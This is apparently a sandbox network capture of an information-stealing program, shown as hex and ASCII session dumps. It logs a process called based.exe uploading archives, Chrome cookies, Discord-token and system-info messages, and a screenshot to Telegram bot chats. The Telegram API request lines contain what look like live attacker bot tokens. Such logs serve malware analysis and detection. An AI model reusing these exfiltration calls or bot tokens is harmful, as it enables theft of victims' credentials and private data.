c9 75 db 95 a4 e5 cd e5 67 ce bb c6 de 4e bb 06 03 Data Ascii: --0b4ba1c968e585ef344eda942b799b23Content-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!kP!A>:W^UN$;z{a\VboQugN
2024-06-05 01:56:44 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:44 GMT Content-Type: application/json Content-Length: 1693 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:44 UTC	1693	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 30 36 32 36 32 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 61 63 6b 75 70 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 63 6b 75 70 70 72 6f 6d 65 74 68 65 75 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 30 37 32 35 30 38 36 31 39 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 34 35 5c 75 30 34 34 33 5c 75 30 34 33 39 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 Data Ascii: {"ok":true,"result":{"message_id":9598,"from":{"id":7006262545,"is_bot":true,"first_name":"backupbot","username":"backupprometheusbot"},"chat":{"id":-1002072508619,"title":"\u0445\u0443\u0439","type":"supergroup"},"date":1717552604,"document":{"file_name"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49755	149.154.167.220	443	7840	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:45 UTC	266	OUT	POST /bot5358754228:AAE42HAGW1bzIPxU7iVRC_96iDuHcwSjjVo/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 3568 User-Agent: python-urllib3/2.2.1 Content-Type: multipart/form-data; boundary=f210e1d1e9b1545afc14bca514fed8ef
2024-06-05 01:56:45 UTC	3568	OUT	Data Raw: 2d 2d 66 32 31 30 65 31 64 31 65 39 62 31 35 34 35 61 66 63 31 34 62 63 61 35 31 34 66 65 64 38 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 d5 0c 6b 50 21 04 00 00 01 0f 41 3e ef 3a 57 ce d5 f4 d7 95 5e 93 c0 a5 dd 9e 0a 55 e3 03 d8 1e 4e b0 24 c0 8a e2 fb 3b 7a 09 da 7f bb 98 90 7b b7 bb ad 61 b8 11 da ef 80 19 5c 8a b3 dd e1 56 99 9a 62 b4 6f 51 c9 75 db 95 a4 e5 cd e5 67 ce bb c6 de 4e bb 06 03 Data Ascii: --f210e1d1e9b1545afc14bca514fed8efContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!kP!A>:W^UN$;z{a\VboQugN
2024-06-05 01:56:46 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:46 GMT Content-Type: application/json Content-Length: 1708 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:46 UTC	1708	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 35 38 37 35 34 32 32 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6c 6f 78 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 35 35 36 38 37 32 32 32 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 6f 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 72 69 6f 42 6c 30 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 30 36 2c 22 64 6f Data Ascii: {"ok":true,"result":{"message_id":26910,"from":{"id":5358754228,"is_bot":true,"first_name":"MarioBot","username":"MarioBloxBot"},"chat":{"id":5556872222,"first_name":"Mario","last_name":"Blox","username":"MarioBl0x","type":"private"},"date":1717552606,"do

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49758	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:50 UTC	388	OUT	POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb) HTTP/1.1 Content-Type: multipart/form-data; boundary="463d8e90-76b1-4e7d-9810-9ea4ed1571fc" Host: api.telegram.org Content-Length: 2109 Expect: 100-continue Connection: Keep-Alive
2024-06-05 01:56:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-06-05 01:56:51 UTC	40	OUT	Data Raw: 2d 2d 34 36 33 64 38 65 39 30 2d 37 36 62 31 2d 34 65 37 64 2d 39 38 31 30 2d 39 65 61 34 65 64 31 35 37 31 66 63 0d 0a Data Ascii: --463d8e90-76b1-4e7d-9810-9ea4ed1571fc
2024-06-05 01:56:51 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 72 6f 77 73 65 72 20 64 61 74 61 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 42 72 6f 77 73 65 72 25 32 30 64 61 74 61 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename="Browser data.zip"; filename*=utf-8''Browser%20data.zip
2024-06-05 01:56:51 UTC	1910	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 18 af c4 58 3f 9e 58 b9 dc 06 00 00 11 0d 00 00 1c 00 00 00 63 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 5b 44 65 66 61 75 6c 74 5d 2e 74 78 74 c5 57 4b 8f 9b c8 1a 5d 13 29 7f 23 1b 8b 6e 8a aa a2 aa 16 bd e0 ed 07 b6 31 f8 bd 69 01 06 1b 83 c1 3c 0c b6 35 ca 6f bf b4 33 c9 24 52 6e d2 d1 2c 86 05 08 89 3a 75 be c7 39 5f f1 f1 c3 d3 3e cf f7 69 f8 14 e4 27 6e ee 2c 74 ee 99 33 64 cb d5 39 00 21 96 24 40 25 01 4a 54 02 0c 72 93 81 c6 61 00 5e 8e d4 9d 2d e6 69 9d 2d 17 38 98 ca e1 ed 5e b8 d7 15 5f f4 a7 5e e2 5c 94 be 36 33 ad b9 19 06 a1 ca b6 b8 74 ee 09 ae cb f1 c8 47 ea 65 ab be aa c6 29 20 23 a3 9d 05 ce d0 e2 0b f3 4e c7 4d 92 dc c7 db 93 9e 36 6b d9 58 59 53 7e 6e 6f 99 3d 2e 94 8d 4c e8 56 be 78 e1 39 5b 0f 9c 7e c8 Data Ascii: PKX?Xcookies/Chrome [Default].txtWK])#n1i<5o3$Rn,:u9_>i'n,t3d9!$@%JTra^-i-8^_^\63tGe) #NM6kXYS~no=.LVx9[~
2024-06-05 01:56:51 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 36 33 64 38 65 39 30 2d 37 36 62 31 2d 34 65 37 64 2d 39 38 31 30 2d 39 65 61 34 65 64 31 35 37 31 66 63 2d 2d 0d 0a Data Ascii: --463d8e90-76b1-4e7d-9810-9ea4ed1571fc--
2024-06-05 01:56:51 UTC	929	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:51 GMT Content-Type: application/json Content-Length: 541 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":81329,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552611,"document":{"file_name":"Browser data.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEBPbFmX8Xjy2eMUnUjGoNLIW4U3jpQqwAC2REAAiIcAVMAAQMT1OUKSpE1BA","file_unique_id":"AgAD2REAAiIcAVM","file_size":1910},"caption":"\ud83d\udcc2 - Browser data\n\u251c\u2500\u2500 \ud83d\udcc2 - cookies(3.27 kb)"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49760	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:52 UTC	160	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1 Host: api.telegram.org
2024-06-05 01:56:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:52 GMT Content-Type: application/json Content-Length: 273 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:52 UTC	273	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 32 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 38 65 Data Ascii: {"ok":true,"result":{"message_id":81330,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552612,"text":"\ud83d\udc8e

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49761	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:53 UTC	521	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1 Host: api.telegram.org
2024-06-05 01:56:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:53 GMT Content-Type: application/json Content-Length: 562 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:56:53 UTC	562	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 33 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 61 35 Data Ascii: {"ok":true,"result":{"message_id":81331,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552613,"text":"\ud83d\udda5

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49762	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:54 UTC	293	OUT	POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1 Content-Type: multipart/form-data; boundary="7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb" Host: api.telegram.org Content-Length: 128871 Expect: 100-continue
2024-06-05 01:56:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-06-05 01:56:54 UTC	40	OUT	Data Raw: 2d 2d 37 65 35 30 64 32 63 66 2d 65 65 31 66 2d 34 61 65 35 2d 39 65 33 38 2d 36 35 36 39 33 62 33 30 65 32 65 62 0d 0a Data Ascii: --7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb
2024-06-05 01:56:54 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 6a 70 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=screenshot.jpg; filename*=utf-8''screenshot.jpg
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: 29 68 a6 31 28 a2 8a 60 14 94 b4 98 a2 e0 2e 69 c1 cf d7 eb 4c a2 98 0f 3b 1b a8 c7 d2 9a 62 53 f7 5b f3 a4 cd 14 b4 18 86 36 1d b3 f4 a6 60 8e d5 2e f2 29 77 83 f7 86 68 b0 5d 90 51 8a 9f 6a 1f 6a 69 88 ff 00 09 06 8b 31 dc 8b 14 62 9c 54 8e a2 9b de 91 41 49 4b 45 00 25 18 a2 8a 06 25 14 a6 92 80 13 8a 29 69 0d 03 12 8a 5a 4a 63 12 8a 5a 4a 00 29 3d e9 69 28 00 a4 a5 a2 81 89 41 a2 8a 63 12 92 9d 46 28 b8 5c 6d 14 b4 50 31 b4 52 9a 4a 06 84 34 52 d2 50 01 49 8a 5a 28 18 d3 46 29 69 28 b0 c2 92 94 d2 50 31 3a d2 53 a9 31 40 d0 86 93 14 bd e8 a0 04 22 93 14 b4 50 31 a4 51 4b 8a 4a 06 26 31 49 d6 9d 46 28 18 dc 62 92 9d 8a 42 28 18 df f3 d2 83 4a 45 25 03 02 29 b4 ea 4c 50 02 51 45 06 91 42 77 a4 ea 29 7a 52 75 fa 9a 06 84 23 8a 42 29 c7 f9 d2 1f d2 81 8d Data Ascii: )h1(`.iL;bS[6`.)wh]Qjji1bTAIKE%%)iZJcZJ)=i(AcF(\mP1RJ4RPIZ(F)i(P1:S1@"P1QKJ&1IF(bB(JE%)LPQEBw)zRu#B)
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: 1b eb 9b b4 69 92 0d 3c 02 d1 c4 ac 54 b1 f9 1b 71 25 5b 8e 30 07 5e 78 2c 84 f7 56 1f 6a 11 e5 0e f2 a1 9d 15 dd 53 ef 15 42 43 30 18 39 20 1c 60 fa 1a a2 aa 6d 6f ac 2e 25 d3 e6 b9 9b 4e 93 7d a4 b0 5c 08 b8 de 5f 64 80 a3 6e 50 c4 9e 36 9f 98 8c f4 c5 1b 78 ef 63 b5 b6 6b 8b 09 1f 53 b4 86 68 2d ae 63 b8 db 12 ac 85 ce 5e 3d a7 73 29 91 f0 77 01 d3 20 e3 9f 16 55 b1 b0 9c ad 1b ea fd 3c 8f a5 8e 1f 2e a9 4a 37 9d b4 5e be 77 d3 fc ce 81 c3 c7 63 f6 d6 50 20 f2 c4 c7 f7 89 bc 46 4e 03 94 ce f0 a7 23 e6 23 1c 8f 5a 95 ad a6 86 e2 cd 6e 23 29 0c d7 b0 5a c8 cb 2c 65 a3 69 5b 00 32 e4 95 6c 67 82 32 3b 8a e5 ee 62 bb 7d 3e 42 b6 32 c7 aa c9 63 15 94 97 42 7c c4 63 4d a0 15 8f 6f 0c 55 14 13 b8 8e b8 03 3c 5e d4 27 5d 2c 7d ba 3d 3a 3f ed 4b dd 6a d6 fe 4b Data Ascii: i<Tq%[0^x,VjSBC09 `mo.%N}\_dnP6xckSh-c^=s)w U<.J7^wcP FN##Zn#)Z,ei[2lg2;b}>B2cB\|cMoU<^'],}=:?KjK
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: cd bb 62 22 e1 54 13 ce 07 27 92 4e 58 f3 5e 7f 7b e2 9f 10 6a 56 37 51 41 3c 36 aa 24 b0 b8 b5 b9 fb 29 8d a5 86 5b 8d a3 e4 59 d8 e0 e1 4f cc 54 91 b9 4a 8c e4 6d c9 ad df db 6a b7 5a 75 ac 5a 6c 37 b3 ea 71 5a 1b b3 6e db 09 36 ab 2b 3b a8 70 58 9d a5 40 dc 38 db c9 c7 22 4e df d7 97 f9 87 f5 fa 9d 0d e7 87 b4 db e8 ae 63 9e 19 40 b9 9d 2e 65 68 ae 24 89 8c 88 14 2b 06 56 05 70 11 7a 11 d2 a0 93 c2 9a 5c d6 f1 db cc 75 09 62 4d c0 ac 9a 95 cb 79 80 f5 57 cc 9f bc 5f f6 5b 23 93 c7 26 b1 63 f1 0e bf 7b 75 63 a7 da 36 97 1d cc 9f 6c 59 ae 5e 19 1e 26 30 3a 28 64 50 e0 e0 ee 20 82 c7 07 b9 c7 39 7a 79 3e 28 f1 5e 9f aa cd a0 e9 37 8d 26 8f 67 3b 9b b7 e6 d8 99 25 24 c5 98 db 27 f1 5e 83 9f 44 b5 b5 bf af ea c0 ef 66 fb 7f 9d 8e ce e3 c3 7a 55 d3 48 ef 6e Data Ascii: b"T'NX^{jV7QA<6$)[YOTJmjZuZl7qZn6+;pX@8"Nc@.eh$+Vpz\ubMyW_[#&c{uc6lY^&0:(dP 9zy>(^7&g;%$'^DfzUHn
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: e9 49 d2 91 42 63 d7 a5 1d a8 fc 28 3d 0d 03 47 a0 51 46 28 ac 0f 93 37 fc 1d ff 00 21 e5 ff 00 ae 6d fd 2b bf 96 67 81 0c b1 c2 f3 ba f2 b1 26 32 c7 b0 e7 8a e0 3c 1f ff 00 21 e1 ff 00 5c db fa 57 a1 c4 7f 7e 9f 5a f8 4e 20 76 cc 23 e8 bf 36 7e 81 c3 4a f9 7b f5 7f 92 19 6d 7b 77 70 c5 6e 74 f9 2d a7 8f e6 2b bc 3a b2 9e ea c3 83 d0 e4 70 6a 7b cd f8 66 8e 54 46 8d 7c c0 0a e4 f1 9f 7e 87 a5 72 9a 0d de a9 70 8b 2e a1 73 74 64 b5 bc f2 59 5d 76 2b 97 5c 32 91 dc 2b 67 07 d0 d6 e5 f9 73 ae 46 82 37 28 d6 cd 97 d8 c4 03 87 ef b0 81 f8 b2 fe 3d 0f 45 5a 4a 15 1a fc 8e da 55 5c e9 df f3 39 cf 88 7f f1 f3 61 fe e3 ff 00 31 5c 5d 76 9f 10 ff 00 e3 e6 c3 fd c7 fe 62 b8 ba fa 5c b7 fd d6 1f 3f cd 9f 0d 9d 7f bf 54 f9 7e 48 28 a2 8a ed 3c b0 aa da 2e 91 63 af 78 Data Ascii: IBc(=GQF(7!m+g&2<!\W~ZN v#6~J{m{wpnt-+:pj{fTF\|~rp.stdY]v+\2+gsF7(=EZJU\9a1\]vb\?T~H(<.cx
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: a1 0d 9e 4a 1c 6e c9 2d 9d a7 00 56 d4 6f a9 9d 4a 58 e5 b2 81 6c 02 e6 39 96 77 69 59 b8 e0 c7 e5 80 07 5e 77 9e 83 8e 78 6b c8 1f 99 25 ed a4 3a 85 8d c5 9d c2 ee 82 e2 36 8a 45 ce 32 ac 30 7f 43 58 09 e0 ab 6c ca d7 5a a6 a5 79 2c 8b 6e 86 49 9a 20 42 c1 27 98 80 04 45 1d 7a f1 92 3d f9 ad 2f ec eb e8 b5 29 ef a3 ba 9a 55 60 e6 3b 49 03 2c 60 95 8c 01 9e 70 01 8d 8e 76 ff 00 cb 43 c7 a8 26 f1 07 91 6e 4e 95 60 26 67 22 74 17 b2 ed 45 cf 05 4f 91 f3 1c 76 21 7e b4 96 f7 07 b1 13 f8 6a cd f5 36 bf 32 cf e6 9b d5 bd c0 61 b7 78 87 c9 03 a7 4d bc fa e7 bf 6a ce ff 00 84 0e c9 60 8e 08 75 3d 4a 08 56 c6 3d 3e 54 8d e3 c4 d0 a9 63 b5 b2 84 82 77 9c 95 da 7d 08 ad 6d 36 d7 53 b1 d3 ee d6 76 fb 55 cb 5c 5c 4b 00 77 7d bb 59 d9 a3 42 c5 49 50 01 03 80 71 8e 33 Data Ascii: Jn-VoJXl9wiY^wxk%:6E20CXlZy,nI B'Ez=/)U`;I,`pvC&nN`&g"tEOv!~j62axMj`u=JV=>Tcw}m6SvU\\Kw}YBIPq3
2024-06-05 01:56:54 UTC	16355	OUT	Data Raw: 6b 6e bd 17 e1 ef fc 80 ee bf eb ed bf f4 04 af 9d ce 30 9e f7 b7 e6 de ca df 79 f4 19 1b 75 a6 e8 a7 6b 26 ef f7 2f d4 f1 fb ef 12 5e 6a 5a 0d 96 93 75 14 12 25 97 fa 99 ca b7 9a 17 fb b9 ce 31 d0 74 ec 2b bf f8 7d a0 69 da ff 00 81 e6 b5 d5 6d 4c f6 e3 51 69 51 4b b2 7c c2 35 5c e5 48 3d c8 af 4e a2 bc 45 0b 3b 9f 51 47 06 e1 3e 79 4a fd 36 39 5b 8f 86 fe 13 ba 8e de 39 b4 9d cb 6f 19 8a 21 f6 89 46 d5 2c cf 8e 1b 9f 99 d8 f3 eb 5c ff 00 8f ff 00 e4 62 8b fe bd 13 ff 00 43 7a f4 aa f3 5f 1f ff 00 c8 c5 17 fd 7a 27 fe 86 f5 e8 e5 9f ef 51 f9 fe 4c e6 ce a2 96 02 a5 97 6f cd 1c bd 25 14 57 d6 1f 02 14 51 45 00 14 51 45 00 25 14 1a 28 00 a2 8a 28 00 a2 8a 28 00 a4 a5 ed 49 40 c2 8a 28 a0 02 8a 43 45 00 19 a2 8a 28 00 a2 8a 3b d3 18 52 52 9a 4a 00 28 a2 8a Data Ascii: kn0yuk&/^jZu%1t+}imLQiQK\|5\H=NE;QG>yJ69[9o!F,\bCz_z'QLo%WQEQE%(((I@(CE(;RRJ(
2024-06-05 01:56:54 UTC	14195	OUT	Data Raw: 31 28 a2 8a 06 14 94 51 4c 02 92 94 d2 50 30 a4 a0 d1 40 05 25 2d 25 00 14 86 96 90 d0 30 a4 a5 a4 a0 61 48 69 69 28 18 50 68 a4 a6 01 49 4b 49 40 c0 f4 a4 a5 a4 a0 61 49 4b 49 40 05 25 29 a4 a0 62 51 45 14 0c 4a 28 a2 81 89 45 14 94 00 52 50 68 a0 61 49 45 14 0c 29 28 a0 d3 18 94 86 96 92 81 85 25 2d 25 03 0a 4a 53 49 40 09 45 14 94 0c 29 29 69 28 18 86 8a 28 a0 62 51 45 21 a0 61 49 4b 49 40 c4 a2 8a 28 18 94 86 94 d2 50 86 14 94 b4 94 0c 29 0f 7a 5a 4a 00 4a 4a 5a 4c 50 50 52 52 f3 49 40 08 69 29 4d 06 81 89 49 4b 49 40 c4 34 94 a6 8a 06 25 1f d2 96 9a 79 a6 30 e9 48 69 73 cd 21 e6 90 c4 3d 28 e9 47 7a 3f 1a 06 07 fa d3 48 a7 52 73 4c 62 52 67 9a 53 d6 92 81 89 8a 29 68 c7 e7 48 62 52 63 1f 9d 29 a4 a0 61 8a 4e f4 1e 28 c7 e3 40 c4 34 50 68 ef 40 05 27 Data Ascii: 1(QLP0@%-%0aHii(PhIKI@aIKI@%)bQEJ(ERPhaIE)(%-%JSI@E))i((bQE!aIKI@(P)zZJJJZLPPRRI@i)MIKI@4%y0His!=(Gz?HRsLbRgS)hHbRc)aN(@4Ph@'
2024-06-05 01:56:55 UTC	1237	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:56:55 GMT Content-Type: application/json Content-Length: 849 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection 